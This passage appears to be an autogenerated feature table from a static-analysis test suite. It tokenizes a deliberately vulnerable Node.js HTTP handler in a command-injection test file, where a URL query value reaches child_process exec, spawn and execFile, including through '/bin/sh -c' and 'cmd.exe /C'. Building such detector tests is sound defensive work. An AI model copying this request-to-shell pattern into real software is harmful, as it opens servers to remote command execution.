autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:17 | args[1] = cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:17 | args[1] = cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:17 | args[1] = cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:10:48:10 | 1 | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:10:48:10 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:10:48:10 | 1 | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:10:48:10 | 1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:10:48:10 | 1 | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:15:48:17 | cmd | assignedToPropName | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:15:48:17 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:15:48:17 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:15:48:17 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:15:48:17 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:15:48:17 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:7 | run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:7 | run | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:7 | run | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:7 | run | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:7 | run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | exceptional return of run("sh", args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | exceptional return of run("sh", args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | exceptional return of run("sh", args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | exceptional return of run("sh", args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | exceptional return of run("sh", args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | run("sh", args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | run("sh", args) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | run("sh", args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | run("sh", args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:5:49:19 | run("sh", args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:9:49:12 | "sh" | CalleeFlexibleAccessPath | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:9:49:12 | "sh" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:9:49:12 | "sh" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:9:49:12 | "sh" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:9:49:12 | "sh" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:9:49:12 | "sh" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:9:49:12 | "sh" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:15:49:18 | args | CalleeFlexibleAccessPath | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:15:49:18 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:15:49:18 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:15:49:18 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:15:49:18 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:15:49:18 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:49:15:49:18 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:12 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:12 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:12 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:12 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:12 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args = [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args = [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args = [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args = [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:9:51:17 | args = [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:16:51:17 | [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:16:51:17 | [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:16:51:17 | [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:16:51:17 | [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:51:16:51:17 | [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:8 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:8 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:8 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:8 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:8 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:11 | args[0] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:11 | args[0] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:11 | args[0] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:11 | args[0] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:11 | args[0] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:23 | args[0] = `-` + "c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:23 | args[0] = `-` + "c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:23 | args[0] = `-` + "c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:23 | args[0] = `-` + "c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:5:52:23 | args[0] = `-` + "c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:10:52:10 | 0 | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:10:52:10 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:10:52:10 | 0 | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:10:52:10 | 0 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:10:52:10 | 0 | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:17 | `-` | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:17 | `-` | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:17 | `-` | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:17 | `-` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:17 | `-` | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:23 | `-` + "c" | assignedToPropName | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:23 | `-` + "c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:23 | `-` + "c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:23 | `-` + "c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:23 | `-` + "c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:15:52:23 | `-` + "c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:16:52:16 | - | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:16:52:16 | - | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:16:52:16 | - | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:16:52:16 | - | enclosingFunctionName | 